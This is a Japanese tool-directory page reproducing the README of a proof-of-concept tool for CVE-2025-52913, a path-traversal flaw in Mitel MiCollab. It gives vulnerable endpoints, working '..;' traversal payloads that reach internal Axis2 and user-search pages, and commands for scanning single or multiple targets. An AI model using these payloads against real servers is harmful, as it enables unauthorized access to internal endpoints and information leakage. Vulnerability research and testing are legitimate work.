Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-CVE-2025-52913 — CVE-2025-52913(Mitel MiCollabにおけるパス正規化の脆弱性)の概念実証(PoC) | Kitploit
ツール/GitHubGitHub/pgasus99/poc-cve-2025-52913
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

CVE-2025-52913(Mitel MiCollabにおけるパス正規化の脆弱性)の概念実証(PoC)

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-52913 - MiCollab パス正規化の脆弱性

📌 概要

このリポジトリには、Mitel MiCollab に影響を与えるパス正規化の脆弱性 CVE-2025-52913 の概念実証(PoC)が含まれています。

この問題により、認証されていない攻撃者が ..; などの細工された URL シーケンスを利用して意図されたパス制限を回避し、内部アプリケーションエンドポイントへのアクセスを可能にします。


⚠️ 影響

悪用に成功すると、以下が可能になる可能性があります:

  • 内部および制限されたエンドポイントへのアクセス
  • 機密性の高いアプリケーションコンポーネントの露出
  • 情報漏洩の可能性

🎯 影響を受けるエンドポイント

脆弱性は以下のパスでトリガーできます:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 ペイロード

トラバーサルペイロードの例:

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 使い方

1. 依存関係のインストール

root@kitploit:~
pip install -r requirements.txt

2. 単一ターゲットに対して実行

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. 複数ターゲットに対して実行

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 例

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 検出

ターゲットが脆弱である可能性が高い条件:

  • サーバーが HTTP 200 を返す

  • レスポンスに以下が含まれる:

    • Axis2
    • Axis2 Happiness Page
    • 内部エンドポイントからの有効なアプリケーション出力

🛠️ 技術的詳細

この脆弱性は、..; を含む細工されたパスの不適切な正規化に起因し、意図されたアプリケーションコンテキストを超えたトラバーサルを可能にします。

この動作により、以下のような内部サービスが露出する可能性があります:

  • Axis2 Web サービスインターフェース
  • 内部ユーザー管理エンドポイント

👤 発見者

Dahmani Toumi によって発見されました


📚 参考文献

  • CVE: CVE-2025-52913
  • (利用可能な場合、ベンダーアドバイザリまたは NVD リンクを追加)

⚖️ 免責事項

このプロジェクトは教育目的および許可されたセキュリティテストのみを目的としています。

明示的な許可なく本ツールをシステムに対して使用しないでください。

著者は誤用や損害について一切の責任を負いません。


ツールをダウンロード